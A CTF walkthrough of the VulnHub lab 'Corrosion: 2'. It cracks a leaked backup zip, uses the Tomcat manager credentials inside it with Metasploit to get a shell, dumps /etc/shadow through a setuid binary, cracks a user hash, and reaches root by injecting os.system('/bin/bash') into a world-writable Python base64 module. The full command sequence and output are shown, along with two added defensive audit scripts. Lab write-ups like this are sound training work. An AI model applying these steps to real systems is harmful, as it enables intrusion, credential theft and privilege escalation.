VulnHub Walkthrough #307: Corrosion: 2
Proxy Programmer’s Corrosion: 2
A medium-difficulty VulnHub machine. The lab can be downloaded from https://www.vulnhub.com/entry/corrosion-2,745/#description. It is designed for experienced CTF players who want to test their skills in a variety of situations. So let's get started and see how the task breaks down into smaller steps.
Network Scanning
First, we scan the network with netdiscover to find the IP address of the target machine.
In this case the victim's IP address is 192.168.74.128.
┌──(root㉿kali)-[~]
└─# netdiscover
Currently scanning: 172.23.193.0/16   |   Screen View: Unique Hosts

265 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 15900
_____________________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.74.1    00:50:56:c0:00:08    238   14280  VMware, Inc.
192.168.74.2    00:50:56:eb:d3:ae     12     720  VMware, Inc.
192.168.74.128  00:0c:29:ca:74:6c     11     660  VMware, Inc.
192.168.74.254  00:50:56:ec:7b:ae      4     240  VMware, Inc.
Next we use Nmap to find out which services the target exposes and which versions are running.
nmap -sV 192.168.74.128
┌──(kali㉿kali)-[~]
└─$ nmap -sV 192.168.74.128
Starting Nmap 7.93 ( https://nmap.org ) at 2025-05-18 07:01 EDT
Nmap scan report for 192.168.74.128
Host is up (0.00059s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
8080/tcp open http Apache Tomcat 9.0.53
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.22 seconds
From the nmap output we have:
- an SSH server on port 22;
- an HTTP service (Apache) on port 80;
- an Apache Tomcat server on port 8080.
Enumeration
Let's start with the HTTP service on port 80. Nothing unusual there: it is just the default Apache page.
Next we looked at the Tomcat server listening on port 8080. Again a plain default page with nothing suspicious.
Since the web pages themselves gave us nothing, we ran dirb against the Tomcat instance to gather more information. Excellent! It turned up a backup zip file in the web root.
dirb http://192.168.74.128:8080/ -X .php,.zip
┌──(kali㉿kali)-[~]
└─$ dirb http://192.168.74.128:8080/ -X .php,.zip

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun May 18 07:19:54 2025
URL_BASE: http://192.168.74.128:8080/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php,.zip) | (.php)(.zip) [NUM = 2]

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.74.128:8080/ ----
+ http://192.168.74.128:8080/backup.zip (CODE:200|SIZE:33723)

-----------------
END_TIME: Sun May 18 07:20:02 2025
DOWNLOADED: 9224 - FOUND: 1
We download the backup zip with wget and try to extract it, but the archive turns out to be password-protected.
┌──(kali㉿kali)-[~]
└─$ wget http://192.168.74.128:8080/backup.zip
--2025-05-18 07:57:24--  http://192.168.74.128:8080/backup.zip
Connecting to 192.168.74.128:8080... connected.
HTTP request sent, awaiting response... 200
Length: 33723 (33K) [application/zip]
Saving to: ‘backup.zip’

backup.zip          100%[================>]  32.93K  --.-KB/s    in 0s

2025-05-18 07:57:24 (352 MB/s) - ‘backup.zip’ saved [33723/33723]

┌──(kali㉿kali)-[~]
└─$ unzip backup.zip
Archive:  backup.zip
[backup.zip] catalina.policy password:
┌──(kali㉿kali)-[~]
└─$ sudo apt install fcrackzip
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages were automatically installed and are no longer required:
  libfcgi-bin libnsl-dev libregexp-assemble-perl libtirpc-dev
Use 'sudo apt autoremove' to remove them.
Suggested packages:
  wordlist
The following NEW packages will be installed:
  fcrackzip
0 upgraded, 1 newly installed, 0 to remove and 1994 not upgraded.
Need to get 27.5 kB of archives.
After this operation, 81.9 kB of additional disk space will be used.
Get:1 http://free.nchc.org.tw/kali kali-rolling/main amd64 fcrackzip amd64 1.0-12 [27.5 kB]
Fetched 27.5 kB in 4s (6,759 B/s)
Selecting previously unselected package fcrackzip.
(Reading database ... 395193 files and directories currently installed.)
Preparing to unpack .../fcrackzip_1.0-12_amd64.deb ...
Unpacking fcrackzip (1.0-12) ...
Setting up fcrackzip (1.0-12) ...
Processing triggers for man-db (2.11.2-1) ...
Processing triggers for kali-menu (2023.1.7) ...
Scanning processes...
Scanning linux images...

Running kernel seems to be up-to-date.

No services need to be restarted.

No containers need to be restarted.

No user sessions are running outdated binaries.

No VM guests are running outdated hypervisor (qemu) binaries on this host.
The rockyou wordlist we need ships with Kali's wordlists package (https://www.kali.org/tools/wordlists/) and has to be unpacked before use.
┌──(root㉿kali)-[~]
└─# ls -lh /usr/share/wordlists/
total 51M
lrwxrwxrwx 1 root root 26 Mar 10 2023 amass -> /usr/share/amass/wordlists
lrwxrwxrwx 1 root root 25 Mar 10 2023 dirb -> /usr/share/dirb/wordlists
lrwxrwxrwx 1 root root 30 Mar 10 2023 dirbuster -> /usr/share/dirbuster/wordlists
lrwxrwxrwx 1 root root 41 Mar 10 2023 fasttrack.txt -> /usr/share/set/src/fasttrack/wordlist.txt
lrwxrwxrwx 1 root root 45 Mar 10 2023 fern-wifi -> /usr/share/fern-wifi-cracker/extras/wordlists
lrwxrwxrwx 1 root root 28 Mar 10 2023 john.lst -> /usr/share/john/password.lst
lrwxrwxrwx 1 root root 27 Mar 10 2023 legion -> /usr/share/legion/wordlists
lrwxrwxrwx 1 root root 46 Mar 10 2023 metasploit -> /usr/share/metasploit-framework/data/wordlists
lrwxrwxrwx 1 root root 41 Mar 10 2023 nmap.lst -> /usr/share/nmap/nselib/data/passwords.lst
-rw-r--r-- 1 root root 51M Feb 16 2023 rockyou.txt.gz
lrwxrwxrwx 1 root root 39 Mar 10 2023 sqlmap.txt -> /usr/share/sqlmap/data/txt/wordlist.txt
lrwxrwxrwx 1 root root 25 Mar 10 2023 wfuzz -> /usr/share/wfuzz/wordlist
lrwxrwxrwx 1 root root 37 Mar 10 2023 wifite.txt -> /usr/share/dict/wordlist-probable.txt

┌──(root㉿kali)-[~]
└─# gunzip /usr/share/wordlists/rockyou.txt.gz

┌──(root㉿kali)-[~]
└─# wc -l /usr/share/wordlists/rockyou.txt; ls -lah /usr/share/wordlists/rockyou.txt
14344392 /usr/share/wordlists/rockyou.txt
-rw-r--r-- 1 root root 134M Feb 16 2023 /usr/share/wordlists/rockyou.txt
Next we use the fcrackzip utility, a lightweight open-source zip password cracker, with the rockyou wordlist.
┌──(kali㉿kali)-[~]
└─$ fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip

PASSWORD FOUND!!!!: pw == @administrator_hi5
With this password we extract the archive and go through every file in it. The interesting one is the Tomcat users file, tomcat-users.xml.
┌──(kali㉿kali)-[~]
└─$ unzip backup.zip
Archive: backup.zip
[backup.zip] catalina.policy password:
  inflating: catalina.policy
  inflating: context.xml
  inflating: catalina.properties
  inflating: jaspic-providers.xml
  inflating: jaspic-providers.xsd
  inflating: logging.properties
  inflating: server.xml
  inflating: tomcat-users.xml
  inflating: tomcat-users.xsd
  inflating: web.xml

┌──(kali㉿kali)-[~]
└─$ ls
backup.zip jaspic-providers.xml server.xml
catalina.policy jaspic-providers.xsd Templates
catalina.properties lab tomcat-users.xml
context.xml logging.properties tomcat-users.xsd
Desktop Music Videos
Documents Pictures web.xml
Downloads Public

┌──(kali㉿kali)-[~]
└─$ cat tomcat-users.xml
<?xml version="1.0" encoding="UTF-8"?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
<!--
  By default, no user is included in the "manager-gui" role required
  to operate the "/manager/html" web application.  If you wish to use this app,
  you must define such a user - the username and password are arbitrary.

  Built-in Tomcat manager roles:
    - manager-gui    - allows access to the HTML GUI and the status pages
    - manager-script - allows access to the HTTP API and the status pages
    - manager-jmx    - allows access to the JMX proxy and the status pages
    - manager-status - allows access to the status pages only

  The users below are wrapped in a comment and are therefore ignored. If you
  wish to configure one or more of these users for use with the manager web
  application, do not forget to remove the <!.. ..> that surrounds them. You
  will also need to set the passwords to something appropriate.
-->
<!--
  <user username="admin" password="<must-be-changed>" roles="manager-gui"/>
  <user username="robot" password="<must-be-changed>" roles="manager-script"/>
-->
<!--
  The sample user and role entries below are intended for use with the
  examples web application. They are wrapped in a comment and thus are ignored
  when reading this file. If you wish to configure these users for use with the
  examples web application, do not forget to remove the <!.. ..> that surrounds
  them. You will also need to set the passwords to something appropriate.
-->
<!--
  <role rolename="tomcat"/>
  <role rolename="role1"/>
  <user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
  <user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
  <user username="role1" password="<must-be-changed>" roles="role1"/>
-->
<role rolename="manager-gui"/>
<user username="manager" password="melehifokivai" roles="manager-gui"/>
<role rolename="admin-gui"/>
<user username="admin" password="melehifokivai" roles="admin-gui, manager-gui"/>
</tomcat-users>

┌──(kali㉿kali)-[~]
└─$
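As an added check that is not part of the walkthrough, the following Python parses a tomcat-users.xml and flags the three things that made this leaked backup so valuable: live accounts holding manager/admin roles, placeholder passwords left in place, and one password shared between accounts. The XML inside is a constructed sample with placeholder passwords, not the file from the box.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict
from typing import Dict, List

# Roles that grant deploy or administrative access to Tomcat's manager and
# host-manager applications; an account with any of these can upload a WAR.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "admin-gui", "admin-script"}
PLACEHOLDER_PASSWORDS = {None, "", "<must-be-changed>"}

# Constructed sample mirroring the layout of the file found in backup.zip:
# two privileged accounts sharing one password, plus one low-privilege user.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <!-- commented-out sample users are ignored by Tomcat and by this audit
  <user username="robot" password="<must-be-changed>" roles="manager-script"/>
  -->
  <role rolename="manager-gui"/>
  <role rolename="admin-gui"/>
  <user username="manager" password="shared-placeholder" roles="manager-gui"/>
  <user username="admin" password="shared-placeholder" roles="admin-gui, manager-gui"/>
  <user username="monitor" password="unique-placeholder" roles="manager-status"/>
</tomcat-users>
"""


def _local_name(tag: str) -> str:
    """Strip the XML namespace: '{http://tomcat.apache.org/xml}user' -> 'user'."""
    return tag.rsplit("}", 1)[-1]


def parse_users(xml_text: str) -> Dict[str, dict]:
    """Return {username: {'password': str, 'roles': set}} for every live <user>."""
    users = {}
    for el in ET.fromstring(xml_text).iter():
        if _local_name(el.tag) == "user":
            roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
            users[el.get("username")] = {"password": el.get("password"), "roles": roles}
    return users


def audit_tomcat_users(xml_text: str) -> List[str]:
    """Flag privileged roles, placeholder passwords and password reuse."""
    findings = []
    by_password = defaultdict(list)
    for name, u in sorted(parse_users(xml_text).items()):
        privileged = sorted(u["roles"] & PRIVILEGED_ROLES)
        if privileged:
            findings.append(f"{name}: privileged roles {privileged}")
        if u["password"] in PLACEHOLDER_PASSWORDS:
            findings.append(f"{name}: placeholder or empty password")
        by_password[u["password"]].append(name)
    for names in by_password.values():
        if len(names) > 1:
            findings.append(f"password shared by {sorted(names)}")
    return findings
```

Run it against the real file with `audit_tomcat_users(open("tomcat-users.xml").read())`; an empty list means no privileged account, no placeholder password and no reuse.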
Exploitation
Now that we have credentials we can attack with Metasploit. The Tomcat manager upload exploit is the obvious choice here. Supply the required options and run it. As you can see, we get a meterpreter session.
msf6 exploit(multi/http/tomcat_mgr_upload) > set rhosts 192.168.74.128
rhosts => 192.168.74.128
msf6 exploit(multi/http/tomcat_mgr_upload) > set rport 8080
rport => 8080
msf6 exploit(multi/http/tomcat_mgr_upload) > set httpusername admin
httpusername => admin
msf6 exploit(multi/http/tomcat_mgr_upload) > set httppassword melehifokivai
httppassword => melehifokivai
msf6 exploit(multi/http/tomcat_mgr_upload) > exploit
We then moved to /home and found two users on the box, jaye and randy. We switched to jaye; the Tomcat password melehifokivai is reused for that account.
In jaye's Files directory there is a setuid-root binary named look, which lets us read any file on the system. We used it on /etc/shadow. Boom! We have the password hashes of every user on the box.
./look '' /etc/shadow
msf6 exploit(multi/http/tomcat_mgr_upload) > sessions

Active sessions
===============

  Id  Name  Type                    Information         Connection
  --  ----  ----                    -----------         ----------
  1         meterpreter java/linux  tomcat @ corrosion  192.168.74.130:4444 -> 192.168.74.128:41308 (192.168.74.128)

msf6 exploit(multi/http/tomcat_mgr_upload) > sessions 1
[*] Starting interaction with 1...

meterpreter > shell
Process 3 created.
Channel 3 created.
cd /home
ls
jaye
randy
cd jaye
ls -al
ls: cannot open directory '.': Permission denied
su jaye
Password: melehifokivai
ls
Desktop
Documents
Downloads
Files
Music
Pictures
Public
snap
Templates
Videos
ls Files
look
./look '' /etc/shadow
sh: 3: ./look: not found
look
usage: look [-bdf] [-t char] string [file ...]
look /etc/shadow^C
Terminate channel 3? [y/N] y
meterpreter > sessions 1
[*] Session 1 is already interactive.
meterpreter > id
[-] Unknown command: id
meterpreter > shell
Process 4 created.
Channel 4 created.
pwd
/home
ls
jaye
randy
cd jaye
ls
ls: cannot open directory '.': Permission denied
su jaye
Password: melehifokivai
ls -al
total 84
drwxr-x--x 18 jaye jaye 4096 Sep 17 2021 .
drwxr-xr-x 4 root root 4096 Sep 17 2021 ..
-rw-r--r-- 1 root root 0 Sep 17 2021 .bash_history
-rw-r--r-- 1 jaye jaye 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 jaye jaye 3771 Feb 25 2020 .bashrc
drwx------ 12 jaye jaye 4096 Sep 17 2021 .cache
drwx------ 11 jaye jaye 4096 Sep 17 2021 .config
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Desktop
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Documents
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Downloads
drwxr-xr-x 2 root root 4096 Sep 17 2021 Files
drwx------ 3 jaye jaye 4096 Sep 17 2021 .gnupg
drwxr-xr-x 3 jaye jaye 4096 Sep 17 2021 .local
drwx------ 5 jaye jaye 4096 Sep 17 2021 .mozilla
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Music
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Pictures
-rw-r--r-- 1 jaye jaye 807 Feb 25 2020 .profile
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Public
drwxr-xr-x 3 jaye jaye 4096 Sep 17 2021 snap
drwx------ 2 jaye jaye 4096 Sep 17 2021 .ssh
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Templates
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Videos
cd file
sh: 2: cd: can't cd to file
cd files
sh: 3: cd: can't cd to files
ls
Desktop
Documents
Downloads
Files
Music
Pictures
Public
snap
Templates
Videos
ls -al
total 84
drwxr-x--x 18 jaye jaye 4096 Sep 17 2021 .
drwxr-xr-x 4 root root 4096 Sep 17 2021 ..
-rw-r--r-- 1 root root 0 Sep 17 2021 .bash_history
-rw-r--r-- 1 jaye jaye 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 jaye jaye 3771 Feb 25 2020 .bashrc
drwx------ 12 jaye jaye 4096 Sep 17 2021 .cache
drwx------ 11 jaye jaye 4096 Sep 17 2021 .config
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Desktop
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Documents
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Downloads
drwxr-xr-x 2 root root 4096 Sep 17 2021 Files
drwx------ 3 jaye jaye 4096 Sep 17 2021 .gnupg
drwxr-xr-x 3 jaye jaye 4096 Sep 17 2021 .local
drwx------ 5 jaye jaye 4096 Sep 17 2021 .mozilla
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Music
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Pictures
-rw-r--r-- 1 jaye jaye 807 Feb 25 2020 .profile
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Public
drwxr-xr-x 3 jaye jaye 4096 Sep 17 2021 snap
drwx------ 2 jaye jaye 4096 Sep 17 2021 .ssh
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Templates
drwxr-xr-x 2 jaye jaye 4096 Sep 17 2021 Videos
cd Files
ls
look
ls -al
total 24
drwxr-xr-x 2 root root 4096 Sep 17 2021 .
drwxr-x--x 18 jaye jaye 4096 Sep 17 2021 ..
---s--s--x 1 root root 14728 Sep 17 2021 look
look '' /etc/shadow
look: /etc/shadow: Permission denied
./look '' /etc/shadow
root:$6$fHvHhNo5DWsYxgt0$.3upyGTbu9RjpoCkHfW.1F9mq5dxjwcqeZl0KnwEr0vXXzi7Tld2lAeYeIio/9BFPjUCyaBeLgVH1yK.5OR57.:18888:0:99999:7:::
daemon:*:18858:0:99999:7:::
bin:*:18858:0:99999:7:::
sys:*:18858:0:99999:7:::
sync:*:18858:0:99999:7:::
games:*:18858:0:99999:7:::
man:*:18858:0:99999:7:::
lp:*:18858:0:99999:7:::
mail:*:18858:0:99999:7:::
news:*:18858:0:99999:7:::
uucp:*:18858:0:99999:7:::
proxy:*:18858:0:99999:7:::
backup:*:18858:0:99999:7:::
list:*:18858:0:99999:7:::
We copy randy's hash from the output, save it in a file named hash, and run john against it with the rockyou wordlist.
┌──(kali㉿kali)-[~]
└─$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt 308hash
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:10:03 16.10% (ETA: 10:52:34) 0g/s 4195p/s 4195c/s 4195C/s zakats..zak1259
0g 0:00:14:32 23.56% (ETA: 10:51:50) 0g/s 4094p/s 4094c/s 4094C/s srk1989..srisrimata
0g 0:00:17:14 28.19% (ETA: 10:51:17) 0g/s 4071p/s 4071c/s 4071C/s rock-o-mania..rock a cutie like me
07051986randy (randy)
1g 0:00:56:52 DONE (2025-05-18 10:47) 0.000293g/s 4082p/s 4082c/s 4082C/s 070552898..070511513
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Privilege Escalation
We now have everything needed for privilege escalation. We log in over SSH as randy with the cracked password,
then check the user's sudo rights with sudo -l. The single rule it reveals can be exploited through Python library hijacking.
┌──(kali㉿kali)-[~]
└─$ ssh randy@192.168.74.128
randy@192.168.74.128's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.11.0-34-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

19 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

randy@corrosion:~$ sudo -l
[sudo] password for randy:
Sorry, try again.
[sudo] password for randy:
Matching Defaults entries for randy on corrosion:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User randy may run the following commands on corrosion:
    (root) PASSWD: /usr/bin/python3.8 /home/randy/randombase64.py
randy@corrosion:~$
randy@corrosion:~$ cat /home/randy/randombase64.py
import base64

message = input("Enter your string: ")
message_bytes = message.encode('ascii')
base64_bytes = base64.b64encode(message_bytes)
base64_message = base64_bytes.decode('ascii')

print(base64_message)
randy@corrosion:~$
The randombase64.py script is what makes the hijack possible: it imports the standard library module base64.
To find where that module lives we used the locate command, which turned it up within seconds. We then checked the file's permissions: it is writable by everyone. Since sudo runs the script as root, whatever we put into this module runs as root too.
randy@corrosion:~$ locate base64
/home/randy/randombase64.py
/snap/core18/2128/usr/bin/base64
/snap/core18/2128/usr/lib/python3.6/base64.py
/snap/core18/2128/usr/lib/python3.6/__pycache__/base64.cpython-36.pyc
/snap/core18/2128/usr/lib/python3.6/email/base64mime.py
/snap/core18/2128/usr/lib/python3.6/email/__pycache__/base64mime.cpython-36.pyc
/snap/core18/2128/usr/lib/python3.6/encodings/base64_codec.py
/snap/core18/2128/usr/lib/python3.6/encodings/__pycache__/base64_codec.cpython-36.pyc
/snap/core18/2855/usr/bin/base64
/snap/core18/2855/usr/lib/python3.6/base64.py
/snap/core18/2855/usr/lib/python3.6/__pycache__/base64.cpython-36.pyc
/snap/core18/2855/usr/lib/python3.6/email/base64mime.py
/snap/core18/2855/usr/lib/python3.6/email/__pycache__/base64mime.cpython-36.pyc
/snap/core18/2855/usr/lib/python3.6/encodings/base64_codec.py
/snap/core18/2855/usr/lib/python3.6/encodings/__pycache__/base64_codec.cpython-36.pyc
/snap/gnome-3-34-1804/72/usr/lib/python2.7/base64.py
/snap/gnome-3-34-1804/72/usr/lib/python2.7/email/base64mime.py
/snap/gnome-3-34-1804/72/usr/lib/python2.7/encodings/base64_codec.py
/snap/gnome-3-34-1804/72/usr/lib/python3.6/base64.py
/snap/gnome-3-34-1804/72/usr/lib/python3.6/__pycache__/base64.cpython-36.pyc
/snap/gnome-3-34-1804/72/usr/lib/python3.6/email/base64mime.py
/snap/gnome-3-34-1804/72/usr/lib/python3.6/email/__pycache__/base64mime.cpython-36.pyc
/snap/gnome-3-34-1804/72/usr/lib/python3.6/encodings/base64_codec.py
/snap/gnome-3-34-1804/93/usr/lib/python2.7/base64.py
/snap/gnome-3-34-1804/93/usr/lib/python2.7/email/base64mime.py
/snap/gnome-3-34-1804/93/usr/lib/python2.7/encodings/base64_codec.py
/snap/gnome-3-34-1804/93/usr/lib/python3.6/base64.py
/snap/gnome-3-34-1804/93/usr/lib/python3.6/__pycache__/base64.cpython-36.pyc
/snap/gnome-3-34-1804/93/usr/lib/python3.6/email/base64mime.py
/snap/gnome-3-34-1804/93/usr/lib/python3.6/email/__pycache__/base64mime.cpython-36.pyc
/snap/gnome-3-34-1804/93/usr/lib/python3.6/encodings/base64_codec.py
/usr/bin/base64
/usr/lib/python3.8/base64.py
/usr/lib/python3.8/__pycache__/base64.cpython-38.pyc
/usr/lib/python3.8/email/base64mime.py
/usr/lib/python3.8/email/__pycache__/base64mime.cpython-38.pyc
/usr/lib/python3.8/encodings/base64_codec.py
/usr/lib/python3.8/encodings/__pycache__/base64_codec.cpython-38.pyc
/usr/share/man/man1/base64.1.gz
/usr/share/mime/application/x-spkac+base64.xml
randy@corrosion:~$ ls -la /usr/lib/python3.8/base64.py
-rwxrwxrwx 1 root root 20386 Sep 20 2021 /usr/lib/python3.8/base64.py
randy@corrosion:~$
We edited this base64 module with nano and inserted two lines right after the existing imports (shown below in context, then on their own). That is enough to obtain root on the victim.
#! /usr/bin/python3.8

"""Base16, Base32, Base64 (RFC 3548), Base85 and Ascii85 data encodings"""

# Modified 04-Oct-1995 by Jack Jansen to use binascii module
# Modified 30-Dec-2003 by Barry Warsaw to add full RFC 3548 support
# Modified 22-May-2007 by Guido van Rossum to use bytes everywhere

import re
import struct
import binascii
import os
os.system ("/bin/bash")


__all__ = [
    # Legacy interface exports traditional RFC 2045 Base64 encodings
    'encode', 'decode', 'encodebytes', 'decodebytes',
    # Generalized interface for other encodings
    'b64encode', 'b64decode', 'b32encode', 'b32decode',
    'b16encode', 'b16decode',
    # Base85 and Ascii85 encodings
    'b85encode', 'b85decode', 'a85encode', 'a85decode',
    # Standard Base64 encoding
    'standard_b64encode', 'standard_b64decode',
import os
os.system ("/bin/bash")
Now we run the sudo rule: it executes randombase64.py as root, which imports our modified base64 module and drops us into a root shell. Boom! We change to /root and read the root flag within seconds.
randy@corrosion:~$ sudo /usr/bin/python3.8 /home/randy/randombase64.py
[sudo] password for randy:
root@corrosion:/home/randy# cd root
bash: cd: root: No such file or directory
root@corrosion:/home/randy# cd /root
root@corrosion:~# cat root.txt
2fdbf8d4f894292361d6c72c8e833a4b
root@corrosion:~#
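The root cause of this escalation is a world-writable module on the import path of an interpreter that sudo runs as root. The following audit, added here and not part of the walkthrough, walks a list of import-path directories and reports any directory or .py module that group or world can write to; its demo() builds a constructed temp directory that mirrors the 0777 base64.py seen above.

```python
import os
import stat
import sys
import tempfile
from typing import List, Tuple


def writable_by_others(mode: int) -> bool:
    """True when group or world has write permission in the mode bits."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_import_path(paths: List[str]) -> List[Tuple[str, str]]:
    """Report every directory on the import path, and every .py module inside
    it, that group/world can write to. A writable directory is as dangerous
    as a writable module, since anyone can drop a new base64.py into it."""
    findings = []
    for directory in paths:
        if not os.path.isdir(directory):
            continue
        st = os.lstat(directory)
        if writable_by_others(st.st_mode):
            findings.append((directory, "directory mode %04o" % stat.S_IMODE(st.st_mode)))
        for name in sorted(os.listdir(directory)):
            if not name.endswith(".py"):
                continue
            path = os.path.join(directory, name)
            st = os.lstat(path)
            if stat.S_ISREG(st.st_mode) and writable_by_others(st.st_mode):
                findings.append((path, "module mode %04o" % stat.S_IMODE(st.st_mode)))
    return findings


def demo() -> List[str]:
    """Constructed sample: a 0777 base64.py (the state ls -la showed on the
    box) beside a correctly permissioned 0644 module, in a 0755 directory."""
    with tempfile.TemporaryDirectory() as directory:
        os.chmod(directory, 0o755)
        for name, mode in (("base64.py", 0o777), ("json.py", 0o644)):
            path = os.path.join(directory, name)
            with open(path, "w") as fh:
                fh.write("# placeholder module body\n")
            os.chmod(path, mode)  # explicit chmod so umask does not interfere
        return [os.path.basename(p) + " " + why for p, why in audit_import_path([directory])]


if __name__ == "__main__":
    # Real use: audit the running interpreter's own import path. Run it with
    # the interpreter named in the sudo rule (/usr/bin/python3.8 on this box)
    # so that the directories checked are exactly the ones root would import from.
    for path, why in audit_import_path([p for p in sys.path if p]):
        print(path, why)
```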
This was an excellent lab with a lot to learn, especially around enumeration and privilege escalation, and well worth doing to build up CTF experience. I hope this walkthrough taught you something new.